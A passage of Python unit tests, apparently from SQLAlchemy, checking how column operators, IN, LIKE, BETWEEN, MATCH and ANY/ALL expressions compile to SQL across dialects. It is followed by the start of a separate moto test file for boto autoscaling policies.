self.assert_compile(f / (f - f).label('foo'), "f / (f - f)")
def test_associativity_9(self):
f = column('f')
self.assert_compile(f / f - f, "f / f - f")
def test_associativity_10(self):
f = column('f')
self.assert_compile((f / f) - f, "f / f - f")
def test_associativity_11(self):
f = column('f')
self.assert_compile((f / f).label('foo') - f, "f / f - f")
def test_associativity_12(self):
f = column('f')
        # because / has higher precedence than -
self.assert_compile(f - (f / f), "f - f / f")
def test_associativity_13(self):
f = column('f')
self.assert_compile(f - (f / f).label('foo'), "f - f / f")
def test_associativity_14(self):
f = column('f')
self.assert_compile(f - f / f, "f - f / f")
def test_associativity_15(self):
f = column('f')
self.assert_compile((f - f) / f, "(f - f) / f")
def test_associativity_16(self):
f = column('f')
self.assert_compile(((f - f) / f) - f, "(f - f) / f - f")
def test_associativity_17(self):
f = column('f')
# - lower precedence than /
self.assert_compile((f - f) / (f - f), "(f - f) / (f - f)")
def test_associativity_18(self):
f = column('f')
# / higher precedence than -
self.assert_compile((f / f) - (f / f), "f / f - f / f")
def test_associativity_19(self):
f = column('f')
self.assert_compile((f / f) - (f - f), "f / f - (f - f)")
def test_associativity_20(self):
f = column('f')
self.assert_compile((f / f) / (f - f), "(f / f) / (f - f)")
def test_associativity_21(self):
f = column('f')
self.assert_compile(f / (f / (f - f)), "f / (f / (f - f))")
class InTest(fixtures.TestBase, testing.AssertsCompiledSQL):
__dialect__ = 'default'
table1 = table('mytable',
column('myid', Integer),
)
table2 = table(
'myothertable',
column('otherid', Integer),
column('othername', String)
)
def test_in_1(self):
self.assert_compile(self.table1.c.myid.in_(['a']),
"mytable.myid IN (:myid_1)")
def test_in_2(self):
self.assert_compile(~self.table1.c.myid.in_(['a']),
"mytable.myid NOT IN (:myid_1)")
def test_in_3(self):
self.assert_compile(self.table1.c.myid.in_(['a', 'b']),
"mytable.myid IN (:myid_1, :myid_2)")
def test_in_4(self):
self.assert_compile(self.table1.c.myid.in_(iter(['a', 'b'])),
"mytable.myid IN (:myid_1, :myid_2)")
def test_in_5(self):
self.assert_compile(self.table1.c.myid.in_([literal('a')]),
"mytable.myid IN (:param_1)")
def test_in_6(self):
self.assert_compile(self.table1.c.myid.in_([literal('a'), 'b']),
"mytable.myid IN (:param_1, :myid_1)")
def test_in_7(self):
self.assert_compile(
self.table1.c.myid.in_([literal('a'), literal('b')]),
"mytable.myid IN (:param_1, :param_2)")
def test_in_8(self):
self.assert_compile(self.table1.c.myid.in_(['a', literal('b')]),
"mytable.myid IN (:myid_1, :param_1)")
def test_in_9(self):
self.assert_compile(self.table1.c.myid.in_([literal(1) + 'a']),
"mytable.myid IN (:param_1 + :param_2)")
def test_in_10(self):
self.assert_compile(self.table1.c.myid.in_([literal('a') + 'a', 'b']),
"mytable.myid IN (:param_1 || :param_2, :myid_1)")
def test_in_11(self):
self.assert_compile(
self.table1.c.myid.in_(
[
literal('a') +
literal('a'),
literal('b')]),
"mytable.myid IN (:param_1 || :param_2, :param_3)")
def test_in_12(self):
self.assert_compile(self.table1.c.myid.in_([1, literal(3) + 4]),
"mytable.myid IN (:myid_1, :param_1 + :param_2)")
def test_in_13(self):
self.assert_compile(self.table1.c.myid.in_([literal('a') < 'b']),
"mytable.myid IN (:param_1 < :param_2)")
def test_in_14(self):
self.assert_compile(self.table1.c.myid.in_([self.table1.c.myid]),
"mytable.myid IN (mytable.myid)")
def test_in_15(self):
self.assert_compile(self.table1.c.myid.in_(['a', self.table1.c.myid]),
"mytable.myid IN (:myid_1, mytable.myid)")
def test_in_16(self):
self.assert_compile(self.table1.c.myid.in_([literal('a'),
self.table1.c.myid]),
"mytable.myid IN (:param_1, mytable.myid)")
def test_in_17(self):
self.assert_compile(
self.table1.c.myid.in_(
[
literal('a'),
self.table1.c.myid +
'a']),
"mytable.myid IN (:param_1, mytable.myid + :myid_1)")
def test_in_18(self):
self.assert_compile(
self.table1.c.myid.in_(
[
literal(1),
'a' +
self.table1.c.myid]),
"mytable.myid IN (:param_1, :myid_1 + mytable.myid)")
def test_in_19(self):
self.assert_compile(self.table1.c.myid.in_([1, 2, 3]),
"mytable.myid IN (:myid_1, :myid_2, :myid_3)")
def test_in_20(self):
self.assert_compile(self.table1.c.myid.in_(
select([self.table2.c.otherid])),
"mytable.myid IN (SELECT myothertable.otherid FROM myothertable)")
def test_in_21(self):
self.assert_compile(~self.table1.c.myid.in_(
select([self.table2.c.otherid])),
"mytable.myid NOT IN (SELECT myothertable.otherid FROM myothertable)")
def test_in_22(self):
self.assert_compile(
self.table1.c.myid.in_(
text("SELECT myothertable.otherid FROM myothertable")
),
"mytable.myid IN (SELECT myothertable.otherid "
"FROM myothertable)"
)
@testing.emits_warning('.*empty sequence.*')
def test_in_23(self):
self.assert_compile(self.table1.c.myid.in_([]),
"mytable.myid != mytable.myid")
def test_in_24(self):
self.assert_compile(
select([self.table1.c.myid.in_(select([self.table2.c.otherid]))]),
"SELECT mytable.myid IN (SELECT myothertable.otherid "
"FROM myothertable) AS anon_1 FROM mytable"
)
def test_in_25(self):
self.assert_compile(
select([self.table1.c.myid.in_(
select([self.table2.c.otherid]).as_scalar())]),
"SELECT mytable.myid IN (SELECT myothertable.otherid "
"FROM myothertable) AS anon_1 FROM mytable"
)
def test_in_26(self):
self.assert_compile(self.table1.c.myid.in_(
union(
select([self.table1.c.myid], self.table1.c.myid == 5),
select([self.table1.c.myid], self.table1.c.myid == 12),
)
), "mytable.myid IN ("
"SELECT mytable.myid FROM mytable WHERE mytable.myid = :myid_1 "
"UNION SELECT mytable.myid FROM mytable WHERE mytable.myid = :myid_2)")
def test_in_27(self):
# test that putting a select in an IN clause does not
# blow away its ORDER BY clause
self.assert_compile(
select([self.table1, self.table2],
self.table2.c.otherid.in_(
select([self.table2.c.otherid],
order_by=[self.table2.c.othername],
limit=10, correlate=False)
),
from_obj=[self.table1.join(self.table2,
self.table1.c.myid == self.table2.c.otherid)],
order_by=[self.table1.c.myid]
),
"SELECT mytable.myid, "
"myothertable.otherid, myothertable.othername FROM mytable "
"JOIN myothertable ON mytable.myid = myothertable.otherid "
"WHERE myothertable.otherid IN (SELECT myothertable.otherid "
"FROM myothertable ORDER BY myothertable.othername "
"LIMIT :param_1) ORDER BY mytable.myid",
{'param_1': 10}
)
def test_in_28(self):
self.assert_compile(
self.table1.c.myid.in_([None]),
"mytable.myid IN (NULL)"
)
@testing.emits_warning('.*empty sequence.*')
def test_in_29(self):
self.assert_compile(self.table1.c.myid.notin_([]),
"mytable.myid = mytable.myid")
@testing.emits_warning('.*empty sequence.*')
def test_in_30(self):
self.assert_compile(~self.table1.c.myid.in_([]),
"mytable.myid = mytable.myid")
class MathOperatorTest(fixtures.TestBase, testing.AssertsCompiledSQL):
__dialect__ = 'default'
table1 = table('mytable',
column('myid', Integer),
)
def _test_math_op(self, py_op, sql_op):
for (lhs, rhs, res) in (
(5, self.table1.c.myid, ':myid_1 %s mytable.myid'),
(5, literal(5), ':param_1 %s :param_2'),
(self.table1.c.myid, 'b', 'mytable.myid %s :myid_1'),
(self.table1.c.myid, literal(2.7), 'mytable.myid %s :param_1'),
(self.table1.c.myid, self.table1.c.myid,
'mytable.myid %s mytable.myid'),
(literal(5), 8, ':param_1 %s :param_2'),
(literal(6), self.table1.c.myid, ':param_1 %s mytable.myid'),
(literal(7), literal(5.5), ':param_1 %s :param_2'),
):
self.assert_compile(py_op(lhs, rhs), res % sql_op)
def test_math_op_add(self):
self._test_math_op(operator.add, '+')
def test_math_op_mul(self):
self._test_math_op(operator.mul, '*')
def test_math_op_sub(self):
self._test_math_op(operator.sub, '-')
def test_math_op_div(self):
if util.py3k:
self._test_math_op(operator.truediv, '/')
else:
self._test_math_op(operator.div, '/')
def test_math_op_mod(self):
self._test_math_op(operator.mod, '%')
class ComparisonOperatorTest(fixtures.TestBase, testing.AssertsCompiledSQL):
__dialect__ = 'default'
table1 = table('mytable',
column('myid', Integer),
)
def test_pickle_operators_one(self):
clause = (self.table1.c.myid == 12) & \
self.table1.c.myid.between(15, 20) & \
self.table1.c.myid.like('hoho')
eq_(str(clause), str(util.pickle.loads(util.pickle.dumps(clause))))
def test_pickle_operators_two(self):
clause = tuple_(1, 2, 3)
eq_(str(clause), str(util.pickle.loads(util.pickle.dumps(clause))))
def _test_comparison_op(self, py_op, fwd_op, rev_op):
dt = datetime.datetime(2012, 5, 10, 15, 27, 18)
for (lhs, rhs, l_sql, r_sql) in (
('a', self.table1.c.myid, ':myid_1', 'mytable.myid'),
('a', literal('b'), ':param_2', ':param_1'), # note swap!
(self.table1.c.myid, 'b', 'mytable.myid', ':myid_1'),
(self.table1.c.myid, literal('b'), 'mytable.myid', ':param_1'),
(self.table1.c.myid, self.table1.c.myid,
'mytable.myid', 'mytable.myid'),
(literal('a'), 'b', ':param_1', ':param_2'),
(literal('a'), self.table1.c.myid, ':param_1', 'mytable.myid'),
(literal('a'), literal('b'), ':param_1', ':param_2'),
(dt, literal('b'), ':param_2', ':param_1'),
(literal('b'), dt, ':param_1', ':param_2'),
):
# the compiled clause should match either (e.g.):
# 'a' < 'b' -or- 'b' > 'a'.
compiled = str(py_op(lhs, rhs))
fwd_sql = "%s %s %s" % (l_sql, fwd_op, r_sql)
rev_sql = "%s %s %s" % (r_sql, rev_op, l_sql)
self.assert_(compiled == fwd_sql or compiled == rev_sql,
"\n'" + compiled + "'\n does not match\n'" +
fwd_sql + "'\n or\n'" + rev_sql + "'")
def test_comparison_operators_lt(self):
self._test_comparison_op(operator.lt, '<', '>'),
def test_comparison_operators_gt(self):
self._test_comparison_op(operator.gt, '>', '<')
def test_comparison_operators_eq(self):
self._test_comparison_op(operator.eq, '=', '=')
def test_comparison_operators_ne(self):
self._test_comparison_op(operator.ne, '!=', '!=')
def test_comparison_operators_le(self):
self._test_comparison_op(operator.le, '<=', '>=')
def test_comparison_operators_ge(self):
self._test_comparison_op(operator.ge, '>=', '<=')
class NonZeroTest(fixtures.TestBase):
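    # bool() on SQL expression constructs is only defined when comparing two
    # constructs with == (it reports whether both sides are the same
    # element); any other comparison raises TypeError.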
def _raises(self, expr):
assert_raises_message(
TypeError,
"Boolean value of this clause is not defined",
bool, expr
)
def _assert_true(self, expr):
is_(bool(expr), True)
def _assert_false(self, expr):
is_(bool(expr), False)
def test_column_identity_eq(self):
c1 = column('c1')
self._assert_true(c1 == c1)
def test_column_identity_gt(self):
c1 = column('c1')
self._raises(c1 > c1)
def test_column_compare_eq(self):
c1, c2 = column('c1'), column('c2')
self._assert_false(c1 == c2)
def test_column_compare_gt(self):
c1, c2 = column('c1'), column('c2')
self._raises(c1 > c2)
def test_binary_identity_eq(self):
c1 = column('c1')
expr = c1 > 5
self._assert_true(expr == expr)
def test_labeled_binary_identity_eq(self):
c1 = column('c1')
expr = (c1 > 5).label(None)
self._assert_true(expr == expr)
def test_annotated_binary_identity_eq(self):
c1 = column('c1')
expr1 = (c1 > 5)
expr2 = expr1._annotate({"foo": "bar"})
self._assert_true(expr1 == expr2)
def test_labeled_binary_compare_gt(self):
c1 = column('c1')
expr1 = (c1 > 5).label(None)
expr2 = (c1 > 5).label(None)
self._assert_false(expr1 == expr2)
class NegationTest(fixtures.TestBase, testing.AssertsCompiledSQL):
__dialect__ = 'default'
table1 = table('mytable',
column('myid', Integer),
column('name', String),
)
def test_negate_operators_1(self):
for (py_op, op) in (
(operator.neg, '-'),
(operator.inv, 'NOT '),
):
for expr, expected in (
(self.table1.c.myid, "mytable.myid"),
(literal("foo"), ":param_1"),
):
self.assert_compile(py_op(expr), "%s%s" % (op, expected))
def test_negate_operators_2(self):
self.assert_compile(
self.table1.select((self.table1.c.myid != 12) &
~(self.table1.c.name == 'john')),
"SELECT mytable.myid, mytable.name FROM "
"mytable WHERE mytable.myid != :myid_1 "
"AND mytable.name != :name_1"
)
def test_negate_operators_3(self):
self.assert_compile(
self.table1.select((self.table1.c.myid != 12) &
~(self.table1.c.name.between('jack', 'john'))),
"SELECT mytable.myid, mytable.name FROM "
"mytable WHERE mytable.myid != :myid_1 AND "
"mytable.name NOT BETWEEN :name_1 AND :name_2"
)
def test_negate_operators_4(self):
self.assert_compile(
self.table1.select((self.table1.c.myid != 12) &
~and_(self.table1.c.name == 'john',
self.table1.c.name == 'ed',
self.table1.c.name == 'fred')),
"SELECT mytable.myid, mytable.name FROM "
"mytable WHERE mytable.myid != :myid_1 AND "
"NOT (mytable.name = :name_1 AND mytable.name = :name_2 "
"AND mytable.name = :name_3)"
)
def test_negate_operators_5(self):
self.assert_compile(
self.table1.select(
(self.table1.c.myid != 12) & ~self.table1.c.name),
"SELECT mytable.myid, mytable.name FROM "
"mytable WHERE mytable.myid != :myid_1 AND NOT mytable.name")
class LikeTest(fixtures.TestBase, testing.AssertsCompiledSQL):
__dialect__ = 'default'
table1 = table('mytable',
column('myid', Integer),
column('name', String),
)
def test_like_1(self):
self.assert_compile(
self.table1.c.myid.like('somstr'),
"mytable.myid LIKE :myid_1")
def test_like_2(self):
self.assert_compile(
~self.table1.c.myid.like('somstr'),
"mytable.myid NOT LIKE :myid_1")
def test_like_3(self):
self.assert_compile(
self.table1.c.myid.like('somstr', escape='\\'),
"mytable.myid LIKE :myid_1 ESCAPE '\\'")
def test_like_4(self):
self.assert_compile(
~self.table1.c.myid.like('somstr', escape='\\'),
"mytable.myid NOT LIKE :myid_1 ESCAPE '\\'")
def test_like_5(self):
self.assert_compile(
self.table1.c.myid.ilike('somstr', escape='\\'),
"lower(mytable.myid) LIKE lower(:myid_1) ESCAPE '\\'")
def test_like_6(self):
self.assert_compile(
~self.table1.c.myid.ilike('somstr', escape='\\'),
"lower(mytable.myid) NOT LIKE lower(:myid_1) ESCAPE '\\'")
def test_like_7(self):
self.assert_compile(
self.table1.c.myid.ilike('somstr', escape='\\'),
"mytable.myid ILIKE %(myid_1)s ESCAPE '\\\\'",
dialect=postgresql.dialect())
def test_like_8(self):
self.assert_compile(
~self.table1.c.myid.ilike('somstr', escape='\\'),
"mytable.myid NOT ILIKE %(myid_1)s ESCAPE '\\\\'",
dialect=postgresql.dialect())
def test_like_9(self):
self.assert_compile(
self.table1.c.name.ilike('%something%'),
"lower(mytable.name) LIKE lower(:name_1)")
def test_like_10(self):
self.assert_compile(
self.table1.c.name.ilike('%something%'),
"mytable.name ILIKE %(name_1)s",
dialect=postgresql.dialect())
def test_like_11(self):
self.assert_compile(
~self.table1.c.name.ilike('%something%'),
"lower(mytable.name) NOT LIKE lower(:name_1)")
def test_like_12(self):
self.assert_compile(
~self.table1.c.name.ilike('%something%'),
"mytable.name NOT ILIKE %(name_1)s",
dialect=postgresql.dialect())
class BetweenTest(fixtures.TestBase, testing.AssertsCompiledSQL):
__dialect__ = 'default'
table1 = table('mytable',
column('myid', Integer),
column('name', String),
)
def test_between_1(self):
self.assert_compile(
self.table1.c.myid.between(1, 2),
"mytable.myid BETWEEN :myid_1 AND :myid_2")
def test_between_2(self):
self.assert_compile(
~self.table1.c.myid.between(1, 2),
"mytable.myid NOT BETWEEN :myid_1 AND :myid_2")
def test_between_3(self):
self.assert_compile(
self.table1.c.myid.between(1, 2, symmetric=True),
"mytable.myid BETWEEN SYMMETRIC :myid_1 AND :myid_2")
def test_between_4(self):
self.assert_compile(
~self.table1.c.myid.between(1, 2, symmetric=True),
"mytable.myid NOT BETWEEN SYMMETRIC :myid_1 AND :myid_2")
def test_between_5(self):
self.assert_compile(
between(self.table1.c.myid, 1, 2, symmetric=True),
"mytable.myid BETWEEN SYMMETRIC :myid_1 AND :myid_2")
def test_between_6(self):
self.assert_compile(
~between(self.table1.c.myid, 1, 2, symmetric=True),
"mytable.myid NOT BETWEEN SYMMETRIC :myid_1 AND :myid_2")
class MatchTest(fixtures.TestBase, testing.AssertsCompiledSQL):
__dialect__ = 'default'
table1 = table('mytable',
column('myid', Integer),
column('name', String),
)
def test_match_1(self):
self.assert_compile(self.table1.c.myid.match('somstr'),
"mytable.myid MATCH ?",
dialect=sqlite.dialect())
def test_match_2(self):
self.assert_compile(
self.table1.c.myid.match('somstr'),
"MATCH (mytable.myid) AGAINST (%s IN BOOLEAN MODE)",
dialect=mysql.dialect())
def test_match_3(self):
self.assert_compile(self.table1.c.myid.match('somstr'),
"CONTAINS (mytable.myid, :myid_1)",
dialect=mssql.dialect())
def test_match_4(self):
self.assert_compile(self.table1.c.myid.match('somstr'),
"mytable.myid @@ to_tsquery(%(myid_1)s)",
dialect=postgresql.dialect())
def test_match_5(self):
self.assert_compile(self.table1.c.myid.match('somstr'),
"CONTAINS (mytable.myid, :myid_1)",
dialect=oracle.dialect())
def test_match_is_now_matchtype(self):
expr = self.table1.c.myid.match('somstr')
assert expr.type._type_affinity is MatchType()._type_affinity
assert isinstance(expr.type, MatchType)
def test_boolean_inversion_postgresql(self):
self.assert_compile(
~self.table1.c.myid.match('somstr'),
"NOT mytable.myid @@ to_tsquery(%(myid_1)s)",
dialect=postgresql.dialect())
def test_boolean_inversion_mysql(self):
        # because mysql doesn't have native boolean
self.assert_compile(
~self.table1.c.myid.match('somstr'),
"NOT MATCH (mytable.myid) AGAINST (%s IN BOOLEAN MODE)",
dialect=mysql.dialect())
def test_boolean_inversion_mssql(self):
        # because mssql doesn't have native boolean
self.assert_compile(
~self.table1.c.myid.match('somstr'),
"NOT CONTAINS (mytable.myid, :myid_1)",
dialect=mssql.dialect())
class ComposedLikeOperatorsTest(fixtures.TestBase, testing.AssertsCompiledSQL):
__dialect__ = 'default'
def test_contains(self):
self.assert_compile(
column('x').contains('y'),
"x LIKE '%%' || :x_1 || '%%'",
checkparams={'x_1': 'y'}
)
def test_contains_escape(self):
self.assert_compile(
column('x').contains('y', escape='\\'),
"x LIKE '%%' || :x_1 || '%%' ESCAPE '\\'",
checkparams={'x_1': 'y'}
)
def test_contains_literal(self):
self.assert_compile(
column('x').contains(literal_column('y')),
"x LIKE '%%' || y || '%%'",
checkparams={}
)
def test_contains_text(self):
self.assert_compile(
column('x').contains(text('y')),
"x LIKE '%%' || y || '%%'",
checkparams={}
)
def test_not_contains(self):
self.assert_compile(
~column('x').contains('y'),
"x NOT LIKE '%%' || :x_1 || '%%'",
checkparams={'x_1': 'y'}
)
def test_not_contains_escape(self):
self.assert_compile(
~column('x').contains('y', escape='\\'),
"x NOT LIKE '%%' || :x_1 || '%%' ESCAPE '\\'",
checkparams={'x_1': 'y'}
)
def test_contains_concat(self):
self.assert_compile(
column('x').contains('y'),
"x LIKE concat(concat('%%', %s), '%%')",
checkparams={'x_1': 'y'},
dialect=mysql.dialect()
)
def test_not_contains_concat(self):
self.assert_compile(
~column('x').contains('y'),
"x NOT LIKE concat(concat('%%', %s), '%%')",
checkparams={'x_1': 'y'},
dialect=mysql.dialect()
)
def test_contains_literal_concat(self):
self.assert_compile(
column('x').contains(literal_column('y')),
"x LIKE concat(concat('%%', y), '%%')",
checkparams={},
dialect=mysql.dialect()
)
def test_contains_text_concat(self):
self.assert_compile(
column('x').contains(text('y')),
"x LIKE concat(concat('%%', y), '%%')",
checkparams={},
dialect=mysql.dialect()
)
def test_startswith(self):
self.assert_compile(
column('x').startswith('y'),
"x LIKE :x_1 || '%%'",
checkparams={'x_1': 'y'}
)
def test_startswith_escape(self):
self.assert_compile(
column('x').startswith('y', escape='\\'),
"x LIKE :x_1 || '%%' ESCAPE '\\'",
checkparams={'x_1': 'y'}
)
def test_not_startswith(self):
self.assert_compile(
~column('x').startswith('y'),
"x NOT LIKE :x_1 || '%%'",
checkparams={'x_1': 'y'}
)
def test_not_startswith_escape(self):
self.assert_compile(
~column('x').startswith('y', escape='\\'),
"x NOT LIKE :x_1 || '%%' ESCAPE '\\'",
checkparams={'x_1': 'y'}
)
def test_startswith_literal(self):
self.assert_compile(
column('x').startswith(literal_column('y')),
"x LIKE y || '%%'",
checkparams={}
)
def test_startswith_text(self):
self.assert_compile(
column('x').startswith(text('y')),
"x LIKE y || '%%'",
checkparams={}
)
def test_startswith_concat(self):
self.assert_compile(
column('x').startswith('y'),
"x LIKE concat(%s, '%%')",
checkparams={'x_1': 'y'},
dialect=mysql.dialect()
)
def test_not_startswith_concat(self):
self.assert_compile(
~column('x').startswith('y'),
"x NOT LIKE concat(%s, '%%')",
checkparams={'x_1': 'y'},
dialect=mysql.dialect()
)
def test_startswith_firebird(self):
self.assert_compile(
column('x').startswith('y'),
"x STARTING WITH :x_1",
checkparams={'x_1': 'y'},
dialect=firebird.dialect()
)
def test_not_startswith_firebird(self):
self.assert_compile(
~column('x').startswith('y'),
"x NOT STARTING WITH :x_1",
checkparams={'x_1': 'y'},
dialect=firebird.dialect()
)
def test_startswith_literal_mysql(self):
self.assert_compile(
column('x').startswith(literal_column('y')),
"x LIKE concat(y, '%%')",
checkparams={},
dialect=mysql.dialect()
)
def test_startswith_text_mysql(self):
self.assert_compile(
column('x').startswith(text('y')),
"x LIKE concat(y, '%%')",
checkparams={},
dialect=mysql.dialect()
)
def test_endswith(self):
self.assert_compile(
column('x').endswith('y'),
"x LIKE '%%' || :x_1",
checkparams={'x_1': 'y'}
)
def test_endswith_escape(self):
self.assert_compile(
column('x').endswith('y', escape='\\'),
"x LIKE '%%' || :x_1 ESCAPE '\\'",
checkparams={'x_1': 'y'}
)
def test_not_endswith(self):
self.assert_compile(
~column('x').endswith('y'),
"x NOT LIKE '%%' || :x_1",
checkparams={'x_1': 'y'}
)
def test_not_endswith_escape(self):
self.assert_compile(
~column('x').endswith('y', escape='\\'),
"x NOT LIKE '%%' || :x_1 ESCAPE '\\'",
checkparams={'x_1': 'y'}
)
def test_endswith_literal(self):
self.assert_compile(
column('x').endswith(literal_column('y')),
"x LIKE '%%' || y",
checkparams={}
)
def test_endswith_text(self):
self.assert_compile(
column('x').endswith(text('y')),
"x LIKE '%%' || y",
checkparams={}
)
def test_endswith_mysql(self):
self.assert_compile(
column('x').endswith('y'),
"x LIKE concat('%%', %s)",
checkparams={'x_1': 'y'},
dialect=mysql.dialect()
)
def test_not_endswith_mysql(self):
self.assert_compile(
~column('x').endswith('y'),
"x NOT LIKE concat('%%', %s)",
checkparams={'x_1': 'y'},
dialect=mysql.dialect()
)
def test_endswith_literal_mysql(self):
self.assert_compile(
column('x').endswith(literal_column('y')),
"x LIKE concat('%%', y)",
checkparams={},
dialect=mysql.dialect()
)
def test_endswith_text_mysql(self):
self.assert_compile(
column('x').endswith(text('y')),
"x LIKE concat('%%', y)",
checkparams={},
dialect=mysql.dialect()
)
class CustomOpTest(fixtures.TestBase):
def test_is_comparison(self):
c = column('x')
c2 = column('y')
op1 = c.op('$', is_comparison=True)(c2).operator
op2 = c.op('$', is_comparison=False)(c2).operator
assert operators.is_comparison(op1)
assert not operators.is_comparison(op2)
class TupleTypingTest(fixtures.TestBase):
def _assert_types(self, expr):
eq_(expr.clauses[0].type._type_affinity, Integer)
eq_(expr.clauses[1].type._type_affinity, String)
eq_(expr.clauses[2].type._type_affinity, LargeBinary()._type_affinity)
def test_type_coersion_on_eq(self):
a, b, c = column(
'a', Integer), column(
'b', String), column(
'c', LargeBinary)
t1 = tuple_(a, b, c)
expr = t1 == (3, 'hi', 'there')
self._assert_types(expr.right)
def test_type_coersion_on_in(self):
a, b, c = column(
'a', Integer), column(
'b', String), column(
'c', LargeBinary)
t1 = tuple_(a, b, c)
expr = t1.in_([(3, 'hi', 'there'), (4, 'Q', 'P')])
eq_(len(expr.right.clauses), 2)
for elem in expr.right.clauses:
self._assert_types(elem)
class AnyAllTest(fixtures.TestBase, testing.AssertsCompiledSQL):
__dialect__ = 'default'
def _fixture(self):
m = MetaData()
t = Table(
'tab1', m,
Column('arrval', Array(Integer)),
Column('data', Integer)
)
return t
def test_any_array(self):
t = self._fixture()
self.assert_compile(
5 == any_(t.c.arrval),
":param_1 = ANY (tab1.arrval)",
checkparams={"param_1": 5}
)
def test_all_array(self):
t = self._fixture()
self.assert_compile(
5 == all_(t.c.arrval),
":param_1 = ALL (tab1.arrval)",
checkparams={"param_1": 5}
)
def test_any_comparator_array(self):
t = self._fixture()
self.assert_compile(
5 > any_(t.c.arrval),
":param_1 > ANY (tab1.arrval)",
checkparams={"param_1": 5}
)
def test_all_comparator_array(self):
t = self._fixture()
self.assert_compile(
5 > all_(t.c.arrval),
":param_1 > ALL (tab1.arrval)",
checkparams={"param_1": 5}
)
def test_any_comparator_array_wexpr(self):
t = self._fixture()
self.assert_compile(
t.c.data > any_(t.c.arrval),
"tab1.data > ANY (tab1.arrval)",
checkparams={}
)
def test_all_comparator_array_wexpr(self):
t = self._fixture()
self.assert_compile(
t.c.data > all_(t.c.arrval),
"tab1.data > ALL (tab1.arrval)",
checkparams={}
)
def test_illegal_ops(self):
t = self._fixture()
assert_raises_message(
exc.ArgumentError,
"Only comparison operators may be used with ANY/ALL",
lambda: 5 + all_(t.c.arrval)
)
# TODO:
# this is invalid but doesn't raise an error,
# as the left-hand side just does its thing. Types
# would need to reject their right-hand side.
self.assert_compile(
t.c.data + all_(t.c.arrval),
"tab1.data + ALL (tab1.arrval)"
)
def test_any_array_comparator_accessor(self):
t = self._fixture()
self.assert_compile(
t.c.arrval.any(5, operator.gt),
":param_1 > ANY (tab1.arrval)",
checkparams={"param_1": 5}
)
def test_all_array_comparator_accessor(self):
t = self._fixture()
self.assert_compile(
t.c.arrval.all(5, operator.gt),
":param_1 > ALL (tab1.arrval)",
checkparams={"param_1": 5}
)
def test_any_array_expression(self):
t = self._fixture()
self.assert_compile(
5 == any_(t.c.arrval[5:6] + postgresql.array([3, 4])),
"%(param_1)s = ANY (tab1.arrval[%(arrval_1)s:%(arrval_2)s] || "
"ARRAY[%(param_2)s, %(param_3)s])",
checkparams={
'arrval_2': 6, 'param_1': 5, 'param_3': 4,
'arrval_1': 5, 'param_2': 3},
dialect='postgresql'
)
def test_all_array_expression(self):
t = self._fixture()
self.assert_compile(
5 == all_(t.c.arrval[5:6] + postgresql.array([3, 4])),
"%(param_1)s = ALL (tab1.arrval[%(arrval_1)s:%(arrval_2)s] || "
"ARRAY[%(param_2)s, %(param_3)s])",
checkparams={
'arrval_2': 6, 'param_1': 5, 'param_3': 4,
'arrval_1': 5, 'param_2': 3},
dialect='postgresql'
)
def test_any_subq(self):
t = self._fixture()
self.assert_compile(
5 == any_(select([t.c.data]).where(t.c.data < 10)),
":param_1 = ANY (SELECT tab1.data "
"FROM tab1 WHERE tab1.data < :data_1)",
checkparams={'data_1': 10, 'param_1': 5}
)
def test_all_subq(self):
t = self._fixture()
self.assert_compile(
5 == all_(select([t.c.data]).where(t.c.data < 10)),
":param_1 = ALL (SELECT tab1.data "
"FROM tab1 WHERE tab1.data < :data_1)",
checkparams={'data_1': 10, 'param_1': 5}
)
|
from __future__ import unicode_literals
import boto
from boto.ec2.autoscale.launchconfig import LaunchConfiguration
from boto.ec2.autoscale.group import AutoScalingGroup
from boto.ec2.autoscale.policy import ScalingPolicy
import sure # noqa
from moto import mock_autoscaling
def setup_autoscale_group():
conn = boto.connect_autoscale()
config = LaunchConfiguration(
name='tester',
image_id='ami-abcd1234',
instance_type='m1.small',
)
conn.create_launch_configuration(config)
group = AutoScalingGroup(
name='tester_group',
max_size=2,
min_size=2,
launch_config=config,
)
conn.create_auto_scaling_group(group)
return group
@mock_autoscaling
def test_create_policy():
setup_autoscale_group()
conn = boto.connect_autoscale()
policy = ScalingPolicy(
name='ScaleUp',
adjustment_type='ExactCapacity',
as_name='tester_group',
scaling_adjustment=3,
cooldown=60,
)
conn.create_scaling_policy(policy)
policy = conn.get_all_policies()[0]
policy.name.should.equal('ScaleUp')
policy.adjustment_type.should.equal('ExactCapacity')
policy.as_name.should.equal('tester_group')
policy.scaling_adjustment.should.equal(3)
policy.cooldown.should.equal(60)
@mock_autoscaling
def test_create_policy_default_values():
setup_autoscale_group()
conn = boto.connect_autoscale()
policy = ScalingPolicy(
name='ScaleUp',
adjustment_type='ExactCapacity',
as_name='tester_group',
scaling_adjustment=3,
)
conn.create_scaling_policy(policy)
policy = conn.get_all_policies()[0]
policy.name.should.equal('ScaleUp')
# Defaults
policy.cooldown.should.equal(300)
@mock_autoscaling
def test_update_policy():
setup_autoscale_group()
conn = boto.connect_autoscale()
policy = ScalingPolicy(
name='ScaleUp',
adjustment_type='ExactCapacity',
as_name='tester_group',
scaling_adjustment=3,
)
conn.create_scaling_policy(policy)
policy = conn.get_all_policies()[0]
policy.scaling_adjustment.should.equal(3)
# Now update it by creating another with the same name
policy = ScalingPolicy(
name='ScaleUp',
adjustment_type='ExactCapacity',
as_name='tester_group',
scaling_adjustment=2,
)
conn.create_scaling_policy(policy)
policy = conn.get_all_policies()[0]
policy.scaling_adjustment.should.equal(2)
@mock_autoscaling
def test_delete_policy():
setup_autoscale_group()
conn = boto.connect_autoscale()
policy = ScalingPolicy(
name='ScaleUp',
adjustment_type='ExactCapacity',
as_name='tester_group',
scaling_adjustment=3,
)
conn.create_scaling_policy(policy)
conn.get_all_policies().should.have.length_of(1)
conn.delete_policy('ScaleUp')
conn.get_all_policies().should.have.length_of(0)
@mock_autoscaling
def test_execute_policy_exact_capacity():
setup_autoscale_group()
conn = boto.connect_autoscale()
policy = ScalingPolicy(
name='ScaleUp',
adjustment_type='ExactCapacity',
as_name='tester_group',
scaling_adjustment=3,
)
conn.create_scaling_policy(policy)
conn.execute_policy("ScaleUp")
instances = list(conn.get_all_autoscaling_instances())
instances.should.have.length_of(3)
@mock_autoscaling
def test_execute_policy_positive_change_in_capacity():
setup_autoscale_group()
conn = boto.connect_autoscale()
policy = ScalingPolicy(
name='ScaleUp',
adjustment_type='ChangeInCapacity',
as_name='tester_group',
scaling_adjustment=3,
)
conn.create_scaling_policy(policy)
conn.execute_policy("ScaleUp")
instances = list(conn.get_all_autoscaling_instances())
instances.should.have.length_of(5)
@mock_autoscaling
